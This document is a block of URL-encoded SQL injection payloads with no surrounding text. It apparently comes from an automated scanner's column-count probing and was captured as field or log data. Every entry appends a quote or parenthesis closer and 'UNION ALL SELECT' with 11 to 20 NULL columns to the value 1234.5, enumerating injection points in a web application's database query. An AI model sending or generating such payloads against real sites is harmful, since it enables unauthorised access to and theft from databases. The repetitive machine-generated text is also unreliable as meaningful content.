1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 